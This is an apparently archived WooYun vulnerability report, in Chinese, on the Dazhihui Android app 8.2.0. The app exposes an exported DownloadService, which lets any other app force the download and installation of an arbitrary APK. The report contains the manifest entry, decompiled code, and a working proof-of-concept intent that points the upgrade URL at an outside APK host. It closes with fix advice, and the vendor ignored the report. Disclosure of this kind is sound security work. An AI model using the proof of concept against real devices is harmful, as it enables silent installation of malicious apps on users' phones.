大智慧安卓app越权下载任意应用 | wooyun-2015-0150312| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150312

漏洞标题：大智慧安卓app越权下载任意应用

漏洞作者：路人甲

提交时间：2015-11-20 10:57

修复时间：2016-02-23 11:00

公开时间：2016-02-23 11:00

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-20：细节已通知厂商并且等待厂商处理中
2015-11-25：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2016-01-19：细节向核心白帽子及相关领域专家公开
2016-01-29：细节向普通白帽子公开
2016-02-08：细节向实习白帽子公开
2016-02-23：细节向公众公开

简要描述：

大智慧安卓app
最新版本 8.2.0
越权下载任意应用

详细说明：

大智慧安卓app可越权下载任意应用
大智慧Android 8.2.0客户端组件**.**.**.**work.DownloadService 暴露，
导致第三方应用可以触发其升级过程，同时可以指定升级下载的URL地址，可导致任意应用安装！
版本号

Manifest.xml文件中，**.**.**.**work.DownloadService组件对外暴露

<service android:exported="true" android:name="**.**.**.**work.DownloadService" android:process="**.**.**.**work.DownloadService">
            <intent-filter android:priority="1000">
                <action android:name="**.**.**.**work.DownloadService"/>
            </intent-filter>
        </service>

该组件对应的代码执行部分如下：

public static boolean a(Context paramContext, String paramString, boolean paramBoolean1, boolean paramBoolean2)
  {
    Intent localIntent;
    String str1;
    int i1;
    if ((paramContext != null) && (!TextUtils.isEmpty(paramString)))
    {
      localIntent = new Intent(paramContext, DownloadService.class);
      localIntent.putExtra("cmd", "start_download");
      str1 = null;
      i1 = paramString.indexOf("?MD5=");
      if (i1 == -1) {
        break label254;
      }
      str1 = paramString.substring(i1 + 5);
    }
    label254:
    for (String str2 = paramString.substring(0, i1);; str2 = paramString)
    {
      if ((!TextUtils.isEmpty(str2)) && (!TextUtils.isEmpty(str1)))
      {
        Log.i("GUH", "startDownloadService");
        localIntent.putExtra("download_silent", paramBoolean1);
        localIntent.putExtra("download_url", str2);
        localIntent.putExtra("download_MD5", str1);
        localIntent.putExtra("download_only_wifi", paramBoolean2);
        a = str2;
        b = str1;
        com.android.dazhihui.b.a.b.a().b("apkDownloadUrl", a);
        com.android.dazhihui.b.a.b.a().b("apkDownloadMd5", b);
        com.android.dazhihui.b.a.b.a().f();
        paramContext.startService(localIntent);
      }
      for (boolean bool = true;; bool = false)
      {
        Log.i("GUH", "startDownloadService return=" + bool + " updateUrl=" + paramString + " silent=" + paramBoolean1 + " wifiLimit=" + paramBoolean2);
        return bool;
      }
    }
  }

该组件从Intent从获取cmd的命令，以及download_silent，download_url，download_MD5，download_only_wifi等数据，当cmd为start_download时，执行下载app升级操作。
并且升级时，的url可以从download_url指定，下载时只是验证md5是否正确，并未验证url的合法性，所以第三方app可以任意指定下载地址。
改漏洞触发poc关键代码如下
public void dazhihui_poc()
{
Intent intent = new Intent();
ComponentName com = new ComponentName("com.android.dazhihui", "**.**.**.**work.DownloadService");
intent.setComponent( com );

intent.putExtra("cmd", "start_download" );
//intent.putExtra("download_MD5", "840f65125e7a995f27871fa5ccdb449b" );
intent.putExtra("download_MD5", "e2f3db1c41839d1d510870f42cf0aaa7" );
intent.putExtra("download_silent", false );
intent.putExtra("download_only_wifi", false );
//intent.putExtra("download_url", "**.**.**.**/app/xrt-v1.0.apk" );
intent.putExtra("download_url", "http://**.**.**.**/data/wisegame/41839d1d510870f4/jiecaojingxuan_51.apk" );

//intent.setAction("com.baidu.android.pushservice.action.MESSAGE");
startService( intent );
}

漏洞证明：

大智慧安卓app可越权下载任意应用
大智慧Android 8.2.0客户端组件**.**.**.**work.DownloadService 暴露，
导致第三方应用可以触发其升级过程，同时可以指定升级下载的URL地址，可导致任意应用安装！
Manifest.xml文件中，**.**.**.**work.DownloadService组件对外暴露

<service android:exported="true" android:name="**.**.**.**work.DownloadService" android:process="**.**.**.**work.DownloadService">
            <intent-filter android:priority="1000">
                <action android:name="**.**.**.**work.DownloadService"/>
            </intent-filter>
        </service>

该组件对应的代码执行部分如下：

public static boolean a(Context paramContext, String paramString, boolean paramBoolean1, boolean paramBoolean2)
  {
    Intent localIntent;
    String str1;
    int i1;
    if ((paramContext != null) && (!TextUtils.isEmpty(paramString)))
    {
      localIntent = new Intent(paramContext, DownloadService.class);
      localIntent.putExtra("cmd", "start_download");
      str1 = null;
      i1 = paramString.indexOf("?MD5=");
      if (i1 == -1) {
        break label254;
      }
      str1 = paramString.substring(i1 + 5);
    }
    label254:
    for (String str2 = paramString.substring(0, i1);; str2 = paramString)
    {
      if ((!TextUtils.isEmpty(str2)) && (!TextUtils.isEmpty(str1)))
      {
        Log.i("GUH", "startDownloadService");
        localIntent.putExtra("download_silent", paramBoolean1);
        localIntent.putExtra("download_url", str2);
        localIntent.putExtra("download_MD5", str1);
        localIntent.putExtra("download_only_wifi", paramBoolean2);
        a = str2;
        b = str1;
        com.android.dazhihui.b.a.b.a().b("apkDownloadUrl", a);
        com.android.dazhihui.b.a.b.a().b("apkDownloadMd5", b);
        com.android.dazhihui.b.a.b.a().f();
        paramContext.startService(localIntent);
      }
      for (boolean bool = true;; bool = false)
      {
        Log.i("GUH", "startDownloadService return=" + bool + " updateUrl=" + paramString + " silent=" + paramBoolean1 + " wifiLimit=" + paramBoolean2);
        return bool;
      }
    }
  }

升级界面

app升级日志如下

安装界面

修复方案：

1 组件不暴露
2 对升级地址进行判断

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-02-23 11:00

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150312

漏洞标题：大智慧安卓app越权下载任意应用

相关厂商：上海大智慧

漏洞作者：路人甲

提交时间：2015-11-20 10:57

修复时间：2016-02-23 11:00

公开时间：2016-02-23 11:00

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150312

漏洞标题：大智慧安卓app越权下载任意应用

相关厂商：上海大智慧

漏洞作者： 路人甲

提交时间：2015-11-20 10:57

修复时间：2016-02-23 11:00

公开时间：2016-02-23 11:00

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0150312"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云